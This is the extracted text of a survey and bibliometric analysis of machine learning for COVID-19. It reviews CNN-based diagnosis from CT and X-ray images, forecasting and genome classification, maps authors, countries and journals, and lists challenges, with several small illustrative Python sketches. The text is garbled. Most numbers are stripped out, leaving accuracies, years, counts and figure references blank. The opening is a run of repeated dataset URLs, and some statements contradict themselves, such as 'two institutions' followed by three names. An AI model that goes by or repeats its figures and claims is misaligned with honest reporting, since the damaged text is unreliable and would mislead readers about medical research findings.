( ) environmental and urban data yang et al. ( a) ct scan yang et al. ( a) yang et al. ( a) ct scan images from a hospital in china chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://bigd.big.ac.cn/ncov https://bigd.big.ac.cn/ncov https://sourceforge.net/projects/mldsp-gui/files/covid dataset https://sourceforge.net/projects/mldsp-gui/files/covid dataset https://sourceforge.net/projects/mldsp-gui/files/covid dataset https://sourceforge.net/projects/mldsp-gui/files/covid dataset https://brasil.io/api/dataset/covid /caso/data/?place_type=state https://brasil.io/api/dataset/covid /caso/data/?place_type=state https://brasil.io/api/dataset/covid /caso/data/?place_type=state https://brasil.io/api/dataset/covid /caso/data/?place_type=state https://www.kaggle.com/sudalairajkumar/novel-corona-virus- -dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus- -dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus- -dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus- -dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus- -dataset https://ourworldindata.org/coronavirus-source-data https://ourworldindata.org/coronavirus-source-data https://ourworldindata.org/coronavirus-source-data http://www.nhc.gov.cn/xcs/yqtb/list_gzbd.shtml http://www.nhc.gov.cn/xcs/yqtb/list_gzbd.shtml http://www.nhc.gov.cn/xcs/yqtb/list_gzbd.shtml https://qianxi.baidu.com/ https://qianxi.baidu.com/ http://news.sohu.com/ / /subject .shtml http://news.sohu.com/ / /subject .shtml http://news.sohu.com/ / /subject .shtml http://news.sohu.com/ / /subject .shtml http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (edema), and eventual appearance of a lines (air) during recovery. peng, wang & zhang ( ) suggested that ultrasound may be useful in recruitment maneuver monitoring and guide prone positioning. chest ct is an indispensable tool for the early screening and diagnosis of suspected covid- infection in patients. previous studies confirmed that the majority of patients infected with covid- exhibited common chest ct characteristics, including ggos and consolidation, which reflect lesions affecting multiple lobes or infections in the bilateral lung parenchyma. increasing evidence suggests that these chest ct characteristics can be used to screen suspected patients and serve as a diagnostic tool for covid- - caused acute respiratory diseases (ards) (xu et al., ). these findings have led to the modification of the diagnosis and treatment protocols of sars-cov- -caused pneumonia to include patients with characteristic pneumonia features on chest ct but negative rt–pcr results in severe epidemic areas such as wuhan city and hubei province (liu et al., a). patients with negative rt–pcr but positive ct findings should be isolated or quarantined to prevent clustered or wide-spread infections. the critical role of ct in the early detection and diagnosis of covid- becomes more publicly acceptable. however, several studies also reported that a proportion of rtpcr-positive patients, including several severe cases, had initially normal cxr or ct findings (fang et al., ). according to the diagnostic criteria of covid- , patients might have no or atypical radiological manifestations even at the mild or moderate stages because several lesions are easily missed in the low-density resolution of cxr, suggesting that chest ct may be a better modality with a lower false-negative rate. 
another possible explanation is that in several patients, the targeted organ of covid- may not be the lung. multiple-organ dysfunctions, including ards, acute cardiac injury, hepatic injury, and kidney injury, have been reported during covid- infection (huang et al., a). studies also reported the chest ct appearances in patients with covid- after treatment, suggesting its critical role in treatment evaluation and follow up. for example, a study investigated the change in chest ct findings associated with covid- at different time points during the infection course (pan et al., ). the results showed that most apparent abnormalities on the chest ct were still observable for days but disappeared at days after the initial onset of symptoms. unexpectedly, a case report showed pre- and post-treatment chest ct findings of a -year-old woman whose rt–pcr result became negative, while pulmonary lesions were reversal (duan & qin, ). deep learning applications for covid- singh et al. ( ) developed a deep cnn, which was applied in the automated diagnosis and analysis of covid- in infected patients to save the time and energy of medical professionals. they tuned and used the hyperparameters of cnn by using multi-objective adaptive differential evolution (made). further in the course of their experiments which were extensively carried out, they used several benchmark covid- datasets. the data used to evaluate the performance of their proposed model were divided into training and testing datasets. the training sets were used to build the covid- chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ classification model. then, the hyperparameters of the cnn model were optimized on the training sets by using the made-based optimization approach. the results from the comparative analysis showed that their proposed method outperformed existing machine learning models such as cnn, ga-based cnn, and pso-based cnn in terms of different metrics (including f-measure, sensitivity, specificity, and kappa statistics). jaiswal et al. ( ) applied deep learning models for the diagnosis and detection of covid- , and it was called densenet -based deep transfer learning (dtl). the authors used these pre-trained deep learning architecture as automation tools to detect and diagnose covid- in chest ct scans. the dtl model was used to classify patients as covid- positive (+ve) or covid- negative (−ve). the proposed model was also utilized to extract several features by adopting its own learned weights on the imagenet dataset along with a convolutional neural structure. extensive analysis of the experiments showed that the proposed dtl-based covid- model was superior to competing methods. the proposed densenet model achieved a % accuracy compared with other models and could serve as an alternative to other covid- testing kits. li et al. ( c) developed a fully automated ai system to assess the severity of covid- and its progression quantitatively using thick-section chest ct images. the ai system was implemented to partition and quantify the covid- -infected lung regions on thick-section chest ct images automatically. the data generated from the automatically segmented lung abnormalities were compared with those of the manually segmented abnormalities of two professional radiologists by using the dice coefficient on a randomly selected subset of ct scans. 
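the dice coefficient used above quantifies the overlap between the automatically and manually segmented lesion masks. the short sketch below, with small binary masks assumed purely for illustration, shows how the score is computed.

```python
# dice coefficient between two binary segmentation masks (toy example)
import numpy as np

def dice(mask_a, mask_b):
    # dice = 2 * |A ∩ B| / (|A| + |B|); 1.0 means perfect overlap
    a, b = mask_a.astype(bool), mask_b.astype(bool)
    denom = a.sum() + b.sum()
    return 2.0 * np.logical_and(a, b).sum() / denom if denom else 1.0

auto_mask = np.zeros((4, 4), dtype=int)
auto_mask[1:3, 1:3] = 1          # automatically segmented lesion
manual_mask = np.zeros((4, 4), dtype=int)
manual_mask[1:3, 1:4] = 1        # radiologist's manual segmentation
print(round(dice(auto_mask, manual_mask), 3))   # 0.8
```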
during manual and automatic comparisons, two biomarker images were automatically computed, namely, the portion of infection (poi) and the average infection hu (ihu), which were then used to assess the severity and progression of the viral disease. the performance of the assessments was then compared with patients’ status of diagnosis reports, and key phrases were extracted from the radiology reports using the area under the receiver’s operating characteristic curve (auc) and cohen’s kappa statistics. further in their study, the poi was the only computed imaging biomarker that was effective enough to show high sensitivity and specificity for differentiating the groups with severe covid- and groups with non-severe covid- . the ihu reflected the progress rate of the infection but was affected by several irrelevant factors such as the construction slice thickness and the respiration status. the results of the analysis revealed that the proposed deep-learning-based ai system accurately quantified the covid- strains associated with the lung abnormalities, and assessed the virus’ severity and its corresponding progression. their results also showed that the deep learning-based tool can help cardiologists in the diagnosis and follow-up treatment for patients with covid- based on the ct scans. singh, kumar & kaur ( ) used a cnn to classify patients with covid- as covid- +ve or covid- −ve. the initial parameters of cnn were tuned by using mode. the authors adopted the mutation, crossover, and selection operations of the differential evolution (de) algorithm. they extracted the chest ct dataset of covid- - infected patients and decomposed them into training and testing groups. the proposed mode-based cnn and competitive classification models were then applied to the chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ training dataset. they compared the competitive and proposed classification models by considering different fractions of the training and testing datasets. the extensive analysis showed that the proposed model classified the chest ct images at reasonable accuracy rates compared with other competing models, such as ann, anfis, and cns. the proposed model was also useful for covid- disease classification from chest ct images. asif & wenhui ( ) implemented a model that automatically detected covid- pneumonia in patients using digital cxr images while maximizing the accuracy in detection by using deep convolutional neural networks (dcnn). their model named dcnn-based model inception v with transfer learning detected covid- infection in patients using cxr radiographs. the proposed dcnn also provided insights on how deep transfer learning methods were used for the early detection of the disease. the experimental results showed that the proposed dcnn model achieved high accuracy. the proposed model also exhibited excellent performance in classifying covid- pneumonia by effectively training itself from a comparatively lower collection of images. hu et al. ( ) implemented a weak supervised deep learning model for detecting and classifying covid- infection from ct images. the proposed model minimized the requirements of manual labeling of ct images and accurately detected the viral disease. the model could distinguish positive covid- cases from non-positive covid- cases by using covid- samples from retrospectively extracted ct images from multiple scanners and centers. 
the proposed method accurately pinpointed the exact position of the lesions (inflammations) caused by the viral covid- and potentially provided advice on the patient’s severity to guide the disease triage and treatment. the experimental results indicated that the proposed model achieved high accuracy, precision, and classification as well as good qualitative visualization for the lesion detections. ayyoubzadeh et al. ( ) conducted a study to predict the incidence and occurrence of covid- in iran. the authors obtained data from the google trends website (recommender systems) and used linear regression and lstm models to estimate the number of positive covid- cases from the extracted data. root mean square error and -fold cross-validation were used as performance metrics. the predictions obtained from the google trend’s website were not very precise but could be used to build a base for accurate models for more aggregated data. their study showed that the population (iranians) focused on the usage of hand sanitizer and handwashing practices with antiseptic as preventive measures against the disease. the authors used specific keywords related to covid- to extract google search frequencies and used the extracted data to predict the degree of covid- epidemiology in iran. they suggested future research direction using other data sources such as social media information, people’s contact with the special call center for covid- , mass media, environmental and climate factors, and screening registries. randhawa et al. ( ) integrated supervised machine learning with digital signal processing called mldsp for genome analyses, which were then augmented by a dt approach to the machine learning component, and a spearman’s rank correlation coefficient analysis for result validation. the authors identified an intrinsic covid- virus genome signature and used it together with a machine-learning-based alignment-free chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ approach for an ultra-fast, scalable, and highly accurate classification of the covid- genomes. they also demonstrated how machine learning used intrinsic genomic signature to provide a rapid alignment-free taxonomic classification of novel pathogens. the model accurately classified the covid- virus without having a priori knowledge by simultaneous processing of the geometric space of all relevant viral genomes. their result analysis supported the hypothesis of a bat origin and classified the covid- virus as sarbecovirus within betacoronavirus. also, their results were obtained through a comprehensive analysis of over , unique viral sequences through an alignment-free analysis of their d genomic signatures, combined with a dt use of supervised machine learning, and confirmed by spearman’s rank correlation coefficient analyses. farhat, sakr & kilany ( ) reviewed the developments of deep learning applications in medical image analysis which targeted pulmonary imaging and provided insights into contributions to covid- . the study covered a survey of various contributions from diverse fields for about years and highlighted various deep learning tasks such as classification, segmentation, and detection as well as different pulmonary pathologies such as airway diseases, lung cancer, covid- , and other infections. 
the study summarized and discussed current state-of-the-art approaches in the research domain, highlighting the challenges, especially given the current covid-19 situation. first, the authors provided an overview of several medical image modalities, deep learning, and surveys on deep learning in medical imaging, in addition to available datasets of pulmonary medical images. second, they provided a summarized survey of deep-learning-based applications and methods on pulmonary medical images. third, they described the covid-19 disease and related medical imaging concerns, summarized reviews on deep learning applied to covid-19 medical imaging analysis, and listed and described contributions to this domain. finally, they discussed the challenges experienced in the research domain and made suggestions for future research.
survey and bibliometric analysis
survey analysis
in this survey, we review the projects that used machine learning to fight covid-19 from different perspectives. we only considered papers published in reputable journals and conferences; no preprint papers uploaded to preprint servers were used in the survey. we appraised studies that reported a description of the machine learning approach used to fight covid-19. we found that machine learning has made inroads into fighting covid-19 from different aspects, with potential for real-life applications to curtail the negative effects of covid-19. machine learning algorithms such as cnn, lstm, and ann utilized in fighting covid-19 mostly reported excellent performance compared with the baseline approaches. many of the studies noted the scarcity of sufficient data to carry out large-scale studies because of the novelty of the covid-19 pandemic.
we found that various studies used different covid-19 data. figure depicts the types of data used in the studies that applied machine learning algorithms to develop models for fighting the covid-19 pandemic; the data used to plot the figure were extracted from machine learning research on covid-19 (refer to table ). the longest bars show that x-rays and ct scans have the highest patronage among the studies. many of the studies used deep learning algorithms, for example cnn and lstm, for the diagnosis of covid-19 on x-rays and ct scans, and the evaluations indicated excellent performance of these algorithms in detecting covid-19 on x-ray and ct scan images. the ct scan has great value in the screening, diagnosis, and follow-up of patients with covid-19 and has now been added as a criterion for diagnosing covid-19 (liu et al., a; li et al., c). the x-ray covid-19 pandemic data project by cohen hosted on github is receiving unprecedented attention from the research community for providing freely accessible data.
figure presents the frequency of machine learning algorithms adopted to fight covid-19. the longest bar indicates that cnn received the most considerable attention from researchers working in this domain. the likely reason why cnn has the highest number of applications is that most of the data used in detecting covid-19 infection in patients are images (see fig. ). cnn is well known for its robustness, effectiveness, and efficiency in image processing compared with other conventional machine learning algorithms because of its automated feature engineering and high performance.
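the transfer-learning recipe that recurs in these image-based studies (a pretrained cnn backbone with a new two-class head) can be sketched as follows. this is a schematic example assuming pytorch/torchvision and a random stand-in batch instead of real chest x-ray or ct data; it is not the exact architecture or training regime of any of the surveyed papers.

```python
import torch
import torch.nn as nn
from torchvision import models

# Load an ImageNet-pretrained ResNet-18 (downloads weights on first use) and
# replace the final layer with a two-class head (COVID-19 vs. non-COVID-19).
model = models.resnet18(weights=models.ResNet18_Weights.DEFAULT)
for p in model.parameters():
    p.requires_grad = False          # freeze the pretrained backbone
model.fc = nn.Linear(model.fc.in_features, 2)

criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.fc.parameters(), lr=1e-3)

# Stand-in batch: 8 images of shape 3x224x224 with binary labels.
images = torch.randn(8, 3, 224, 224)
labels = torch.randint(0, 2, (8,))

optimizer.zero_grad()
loss = criterion(model(images), labels)
loss.backward()
optimizer.step()
print("one training step done, loss:", float(loss))
```

only the small new head is trained in this sketch; in practice the backbone is often unfrozen and fine-tuned once the head has converged, which is one reason transfer learning works with comparatively small image collections.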
the cnn variant most suitable for the diagnosis of covid-19 from x-ray and ct scan images is resnet. however, many of the studies did not report the specific type of cnn adopted for the diagnosis of covid-19 from x-ray and ct scan images (see table ).
figure: visual representation of covid-19 data extracted from different projects.
figure shows the different aspects in which machine learning algorithms were applied in fighting covid-19. we found that the studies mainly adopted machine learning algorithms to develop covid-19 diagnosis tools, decision support systems, drug development, and detection from protein sequences. the largest portion of the pie chart indicates that diagnostic tools attracted the most considerable attention, showing the quest for diagnostic tools in the fight against the covid-19 pandemic: the battle starts with a diagnosis before the appropriate treatment is administered to save a life, and an incorrect diagnosis can lead to inappropriate medication, resulting in further health complications. most of the studies that adopted machine learning to develop diagnostic tools intended to reduce the workload of radiologists, improve the speed of diagnosis, automate the covid-19 diagnostic process, reduce the cost compared with traditional laboratory tests, and help healthcare workers make critical decisions. the studies argued that such diagnostic tools could reduce the exposure of healthcare workers to patients with covid-19, thus decreasing the risk of spreading covid-19 to healthcare workers. the second most substantial portion of the pie chart is the decision support system for detecting the rate of spread of the virus, confirmed cases, mortalities, and recovered cases. this information from the decision support system can help government functionaries, policymakers, decision makers, and other stakeholders formulate policy that can help fight the covid-19 pandemic.
figure: machine learning algorithms adopted in fighting covid-19.
figure: different aspects of machine learning applications in fighting the covid-19 pandemic.
figure: trend of publications on machine learning applications in fighting covid-19.
figure shows that publications on the adoption of machine learning to fight covid-19 started appearing in 2020, with no publications in 2019, although covid-19 emerged in late 2019. this situation is likely because a new virus like the covid-19 pandemic at its initial stage lacks data and comes with scant information and uncertainties.
bibliometric analysis
the primary purpose of conducting a bibliometric analysis in this study is to reflect the trend of rapidly emerging topics in covid-19 research, where substantial research activity already began during the early stage of the outbreak.
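the frequency charts discussed above boil down to counting attributes over the table of surveyed studies. a minimal sketch of that tallying, with a small hypothetical subset of records standing in for the full survey table, could look like this:

```python
from collections import Counter

# Hypothetical records standing in for rows of the survey table:
# (study id, data type, algorithm, application aspect)
studies = [
    ("s1", "x-ray", "cnn", "diagnostic tool"),
    ("s2", "ct scan", "cnn", "diagnostic tool"),
    ("s3", "case counts", "lstm", "decision support"),
    ("s4", "x-ray", "cnn", "diagnostic tool"),
    ("s5", "genome sequence", "decision tree", "detection from protein sequence"),
]

data_types = Counter(s[1] for s in studies)
algorithms = Counter(s[2] for s in studies)
aspects = Counter(s[3] for s in studies)

for name, counts in [("data types", data_types), ("algorithms", algorithms), ("aspects", aspects)]:
    print(name)
    for key, n in counts.most_common():
        print(f"  {key}: {n}")
```

the resulting counters are exactly what a bar or pie chart of data types, algorithms, or application aspects would be plotted from.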
another purpose of the bibliometric analysis presented here is to aid in mapping the research situation on the coronavirus disease as reported in the scientific literature by the research community. in this section, we present the bibliographic coupling among different article items on machine learning to fight covid-19. a link between items on the constructed map corresponds to the weight between them, either in terms of the number of publications, common references, or co-citations. these items may belong to a group or a cluster. in the visualization, items within the same cluster are marked with the same color, and colors indicate the cluster to which a journal was assigned by the clustering technique implemented in the vosviewer software. the circular nodes represent the items, and their sizes vary depending on the weight of the article.
prolific authors
the bibliographic coupling between the top authors is shown in fig. . the two clusters, namely red and green, correspond to authors working on similar research fields ("covid-19") and citing the same sources in their reference listings. the similarity in cluster color also implies a higher degree of overlap between the reference lists of these authors' publications. the figure shows the visible names; other names may not be represented in the constructed map.
figure: bibliographic coupling among the authors. two clusters, namely red (left) and green (right), correspond to all authors working on similar research fields ("covid-19") and citing the same sources in their reference listings.
productive countries
figure shows the bibliographic coupling of the topmost productive countries. here, bibliographic coupling indicates a common reference list in the articles published by these countries. the five clusters are represented by six colors. red represents china and the usa with the highest strength in terms of contributions, followed by india and iran as the next countries within the red node. green represents hong kong, which appears to have the highest strength, whereas blue is for the united kingdom and saudi arabia, which have the highest strength. yellow denotes japan, singapore, thailand, and taiwan as the highest contributors. purple refers to italy and canada as the two contributing countries. the link between the red and green clusters is thicker compared with that between the blue and red clusters or between the blue and purple clusters. the thickness of a link depicts the degree of intersection of the literature between the different locations or countries.
figure: bibliographic coupling among the countries. red represents china and the usa (with india and iran within the red node), green hong kong, blue the united kingdom and saudi arabia, yellow japan, singapore, thailand, and taiwan, and purple italy and canada.
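the bibliographic coupling weights that drive these maps are simply counts of shared references between pairs of items (authors, countries, or journals). a small illustrative computation, with made-up reference lists rather than the actual corpus exported to vosviewer, is shown below.

```python
from itertools import combinations

# Hypothetical reference lists of five items (e.g. articles or authors).
# The coupling weight between two items is the number of references they share.
refs = {
    "A": {"r1", "r2", "r3", "r5"},
    "B": {"r2", "r3", "r7"},
    "C": {"r1", "r5", "r8"},
    "D": {"r7", "r9"},
    "E": {"r2", "r5", "r9"},
}

coupling = {
    (a, b): len(refs[a] & refs[b])
    for a, b in combinations(sorted(refs), 2)
    if refs[a] & refs[b]
}

for pair, weight in sorted(coupling.items(), key=lambda kv: -kv[1]):
    print(pair, "shared references:", weight)
```

items with a large shared-reference count end up connected by thick links and tend to be placed in the same cluster by the mapping software.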
collaborating institutions
figure shows the bibliographic coupling of the network of collaborating institutions affiliated with at least four documents on covid-19 research. map construction and analysis show that only a subset of the institutions meet this threshold, including the guangzhou center for disease control (or chinese center for disease control and prevention), huazhong university of science and technology, wuhan university, capital medical university, chinese academy of medical sciences, university of hong kong, sun yat-sen university, and fudan university. two clusters are identified by red and green colors. institutions that fall under the same group appear to have a similar literature background or to have worked on related research fields.
journals
bibliographic coupling between journals implies that the papers published in these journals have more common reference lists. three clusters are depicted on the map with red, blue, and green colors. the links with the highest strength occur between emerging microbes journal, journal of virology, and journal of infection. these are closely followed by the links between eurosurveillance and journal of infection, archive of academic emergency medicine, chinese medical journal, and the lancet. infection control & hospital epidemiology and journal of hospital infection form the weakest networks of a cluster. figure illustrates the bibliographic coupling between the considered journals.
co-authorship and authors
figure illustrates the co-authorship and author map visualization. this analysis aims to visualize all the major authors publishing together or working on similar research fields. the analysis type is co-authorship, and the unit of analysis is authors. the threshold for the minimum number of articles by an author is . network construction and analysis show that of , authors, only nine meet this limit. however, the largest set of connected entities consists of only eight authors, whose visual representation is depicted in fig. , where a single cluster is denoted by red color. a connecting link indicates that these authors have collaborated on the same project or worked on research with a similar focus, and the thickness of the link between authors indicates more common publications.
figure: bibliographic coupling among institutions. two clusters, namely red (left) and green (right), correspond to institutions working on similar research fields ("covid-19") and citing the same sources in their reference listings.
figure: co-authorship and authors' analysis. the four main clusters, namely blue (right), red (bottom-centre), green (top-centre), and pink (left), match the major co-authors and authors publishing together or working on similar research fields.
figure: bibliographic coupling among the journals. three clusters are depicted on the map with red (left), blue (bottom-centre), and green (right) colors. each cluster shows covid-19 papers with more common reference lists among the associated journals.
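the co-authorship analysis above amounts to building a graph whose nodes are authors (kept only if they reach the article threshold) and whose edges are joint papers, and then inspecting its largest connected set. a toy version of this construction, assuming the networkx library and a fabricated list of author teams, is sketched here.

```python
import networkx as nx
from collections import Counter
from itertools import combinations

# Hypothetical author lists of surveyed papers
papers = [
    ["li", "wang", "chen"],
    ["li", "wang"],
    ["zhang", "liu"],
    ["li", "chen"],
    ["zhang", "liu", "zhao"],
    ["li", "wang", "zhang"],
]

min_articles = 2  # threshold on the minimum number of articles per author (illustrative)
counts = Counter(a for authors in papers for a in authors)
kept = {a for a, n in counts.items() if n >= min_articles}

g = nx.Graph()
g.add_nodes_from(kept)
for authors in papers:
    for a, b in combinations([a for a in authors if a in kept], 2):
        # edge weight counts the number of co-authored papers between a and b
        w = g.get_edge_data(a, b, {"weight": 0})["weight"]
        g.add_edge(a, b, weight=w + 1)

largest = max(nx.connected_components(g), key=len)
print("largest connected set of authors:", sorted(largest))
```

the edge weights correspond to the link thickness in the map, and the largest connected component corresponds to the "most extensive set of connected entities" reported in the analysis.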
impact analysis
figure illustrates the citation analysis among authors' institutions. six clusters are represented using different colors. the red cluster has the highest number of author citations from two institutions, namely the huazhong university of science and technology, wuhan university (state key laboratory of virology), and the department of microbiology, university of hong kong. figure shows the bibliometric analyses of author citations by journal sources. a link between two journal sources indicates the citation connectivity between the two sources. the connected links between the journal of virology and the new england journal of medicine in fig. reveal that a publication from the journal of virology has cited another publication that is published in the new england journal of medicine, or vice versa. the thickness and link strength signify a higher number of citations among the clusters. therefore, among the different clusters identified in the analysis, the journal of virology is the top-cited source by publications from other journal sources.
figure: author citation by journal source. three major clusters, namely red (left), lemon-green (top-right), and green (bottom-left), were identified in the analysis as the top-cited journal sources as per author publications.
figure: author citation by institution. six clusters are represented using different colors to denote author citation counts per institution, for which only the red (bottom-left) cluster has the highest number of author citations from two institutions in china.
challenges and future research opportunities
in this section, we present challenges and future research prospects. figure describes the course of conducting the literature survey and the opportunities for future research, with the possibility of solving the challenges, to help researchers easily identify areas that need development. the challenges and future research opportunities are presented as follows:
figure: visual representation of the challenges.
lack of sufficient covid-19 data: the primary concern with research on covid-19 is the barrier created by the lack of adequate covid-19 clinical data (alimadadi et al., ; mei et al., ; ayyoubzadeh et al., ; fong et al., ; oh, park & ye, ; toğaçar, ergen & cömert, ; ucar & korkmaz, ; belfiore et al., ). however, an in-depth analysis of patients with covid-19 requires much more data (apostolopoulos & mpesiana, ). data is the key component in machine learning; machine learning approaches typically experience a limitation in their efficiency and effectiveness without sufficient data. therefore, insufficient covid-19 clinical data can limit the performance of specific machine learning algorithms, such as deep learning algorithms that require large-scale data.
in this case, developing machine-learning-based covid-19 diagnostic and prognosis tools and therapeutic approaches to curtail covid-19, and predicting a future pandemic, can face a severe challenge in terms of performance due to insufficient covid-19 clinical data. alimadadi et al. ( ) suggested global collaborations among stakeholders to build a covid-19 clinical database and mitigate the issue of inadequate covid-19 clinical data, with existing biobanks containing the data of patients with covid-19 integrated with the covid-19 clinical data. we suggest that researchers use gans to generate additional x-ray and ct scan images for covid-19 to obtain sufficient data for building covid-19 diagnosis tools. for example, loey, smarandache & khalifa ( ) were motivated by insufficient data and used a gan to generate more x-ray images and develop a covid-19 diagnostic tool.
visualization from x-rays and ct scans: figure shows that x-rays and ct scans are the two primary clinical data for detecting covid-19 infection in patients. distinguishing patients with covid-19 and mild symptoms from pneumonia on x-ray images may be visualized inaccurately or not be visualizable at all (apostolopoulos & mpesiana, ). we suggest that researchers propose machine learning strategies that can accurately differentiate patients with covid-19 and mild symptoms from patients with pneumonia symptoms based on x-ray images. covid-19, which is caused by a coronavirus, might have ct scan image characteristics similar to other pneumonia caused by different viruses. in the future, the performance of cnn should be evaluated in classifying covid-19 and viral pneumonia against rt–pcr (li et al., b).
uncertainties: when a new pandemic breaks out, it comes with limited information and very high uncertainty, unlike the commonly known influenza. knowledge regarding the new epidemic is therefore not sufficient due to the absence of a prior case that matches the recent pandemic. in the case of covid-19, many decision makers relied on sars for reference because of the similarity, even though it is considerably different from covid-19. a new pandemic typically poses a challenge to data analytics, considering its limited information and the geographical and temporal evolution of the epidemic. therefore, building an accurate model for predicting the future behavior of a pandemic becomes challenging due to uncertainty (fong et al., ). we suggest that researchers propose new pandemic forecasting models based on active learning to reduce the level of uncertainty typically accompanying new pandemics such as covid-19.
non-uniform pattern: liu et al. ( a) applied a susceptible, exposed, infectious, recovered (seir) model for modeling covid-19. however, the seir model could not capture the complete number of infected cases, and the study ignored imported covid-19 confirmed cases. seir was based on the natural distribution of the population and cannot be applied to, for example, a welfare institute with a different population distribution. the epidemiological trend of covid-19 was not predicted accurately by the seir model under the viral mutation and specific anti-viral therapy development scenario. the seir model was also unable to simulate non-uniform patterns, such as increasing numbers of medical professionals and bed capacity (liu et al., a).
we suggest that researchers propose a machine-learning-based strategy for handling such non-uniform patterns in the future and consider all the factors not accounted for in the study.
insufficient regional data: adequate covid-19 data for a particular region are often lacking because the capacity to gather reliable data is not uniform across regions worldwide. this poses a challenge for regions without available covid-19 data. we suggest that researchers apply a cross-population train–test model, because a model trained in one region can be used to detect covid-19 in a different region; for example, a model trained to detect the new virus in wuhan, china, can be used in italy (santosh, ).
image resolution: the resolution of x-ray images affects the performance of machine learning algorithms. dealing with low-resolution images typically poses a challenge to machine learning approaches, and variable resolution dimensions have a negative effect. successful performance cannot be achieved if the input images have different sizes; the original image resolution dimensions, structured images, and stacking technique need to be the same (toğaçar, ergen & cömert, ). we suggest using high-resolution x-ray images for developing covid-19 diagnostic and prognosis systems, with the ability to also work with low-resolution x-ray images.
outliers and noise: in the early phase of covid-19, the covid-19 data contained many outliers and much noise (tuli et al., ). an outlier is a subset of the data that is inconsistent with the remaining data, and outliers typically lower the fit of a statistical model (bellazzi, guglielmann & ironi, ). the presence of outliers and noise in covid-19 data makes predicting the correct number of covid-19 cases challenging (tuli et al., ), and dealing with them increases data engineering effort and expense. we suggest that researchers propose robust machine learning approaches that can effectively handle outliers and noise in covid-19 data.
transparency and interpretability: a limitation of deep learning algorithms is their deficiency in terms of transparency and interpretability. for instance, it is not possible to know which image features are used to decide the output of a deep learning algorithm. the unique features used by the deep learning algorithm to differentiate covid-19 from community-acquired pneumonia (cap) cannot be sufficiently visualized by a heatmap, although heatmaps are used to visualize the regions in images that led to the algorithm's output (li et al., b). images, especially x-rays and ct scans, are heavily relied on in detecting covid-19. we suggest that researchers propose explainable deep learning algorithms for the detection of covid-19 to instill transparency and interpretability in deep learning algorithms.
misdiagnosis: the application of a deep learning algorithm to detect covid-19 on a chest ct scan has the possibility of misdiagnosis (wu et al., ) because of the similarity of covid-19 symptoms with other types of pneumonia (belfiore et al., ). incorrect diagnoses can mislead health professionals in their decisions and lead to inappropriate medication, further complicating the health condition of the patient with covid-19.
we suggest that researchers combine ct scan diagnosis using deep learning algorithms with clinical information such as nucleic acid detection results, clinical symptoms, epidemiology, and laboratory indicators to avoid misdiagnosis (wu et al., ).
resource allocation: resource allocation is a challenge as the covid-19 pandemic keeps spreading, because an increasing number of patients means that more resources are required to take care of them. the allocation of limited resources in a rapidly expanding pandemic entails difficult decisions about the distribution of scarce resources (jiang et al., ). the epicenters of covid-19 are challenged with resource problems such as shortages of beds, gowns, masks, medical staff, and ventilators (ahuja, reddy & marques, ). we propose the development of machine learning decision support systems to help in crucial decisions on resource allocation.
conclusions
in this study, we present a survey, including a bibliometric analysis, of the adoption of machine learning to fight covid-19. a concise summary of the projects that adopted machine learning to fight covid-19, sources of covid-19 datasets, a new comprehensive taxonomy, synthesis and analysis, and a bibliometric analysis are presented. the results reveal that covid-19 diagnostic tools received the most considerable attention from researchers, and energy and resources are dispensed mostly toward automated covid-19 diagnostic tools; by contrast, covid-19 drug and vaccine development remains grossly underexploited. the algorithm predominantly utilized by researchers in developing diagnostic tools is cnn, mainly applied to x-ray and ct scan images, and the most suitable cnn architecture for the detection of covid-19 from these images is resnet. the challenges hindering practical work on machine learning to fight covid-19 and new perspectives to solve the identified problems are presented in the study. we believe that our survey with bibliometric analysis can enable researchers to determine areas that need further development and to identify potential collaborators at the author, country, and institutional levels.
based on the bibliometric analysis conducted on the global scientific research output on covid-19 disease spread and preventive measures, the results reveal that most of the research outputs were published in prestigious journals with high impact factors, including the lancet, journal of medical virology, and eurosurveillance. the bibliometric analysis also shows the focus subjects in various aspects of covid-19 infection transmission, diagnosis, treatment, prevention, and its complications. other prominent features include strong collaboration among research institutions and universities and co-authorship among researchers across the globe. machine learning algorithms have many practical applications in medicine, and novel contributions from different researchers are still evolving and growing exponentially in a bid to satisfy the essential clinical needs of individual patients, as is the case with their application to fighting the covid-19 pandemic. as a way forward, we suggest an in-depth machine learning application review focusing on the critical analysis of the novel coronavirus disease and other related cases of global pandemics.
additional information and declarations
funding
the authors received no funding for this work.
competing interests
the authors declare that they have no competing interests.
author contributions
haruna chiroma conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
absalom e. ezugwu conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
fatsuma jauro performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
mohammed a. al-garadi performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
idris n. abdullahi performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
liyana shuib performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
data availability
the following information was supplied regarding data availability: all raw data are contained in the methodology and in table .
references
ahuja as, reddy vp, marques o. . artificial intelligence and covid-19: a multidisciplinary approach. integrative medicine research ( ): doi . /j.imr. . .
ai t, yang z, hou h, zhan c, chen c, lv w, tao q, sun z, xia l. . correlation of chest ct and rt-pcr testing in coronavirus disease 2019 (covid-19) in china: a report of cases. radiology ( ):e –e doi . /radiol. .
alimadadi a, aryal s, manandhar i, munroe pb, joe b, cheng x. . artificial intelligence and machine learning to fight covid-19. physiological genomics ( ): – doi . /physiolgenomics. . .
apostolopoulos id, mpesiana ta. . covid-19: automatic detection from x-ray images utilizing transfer learning with convolutional neural networks. physical and engineering sciences in medicine : – doi . /s - - - .
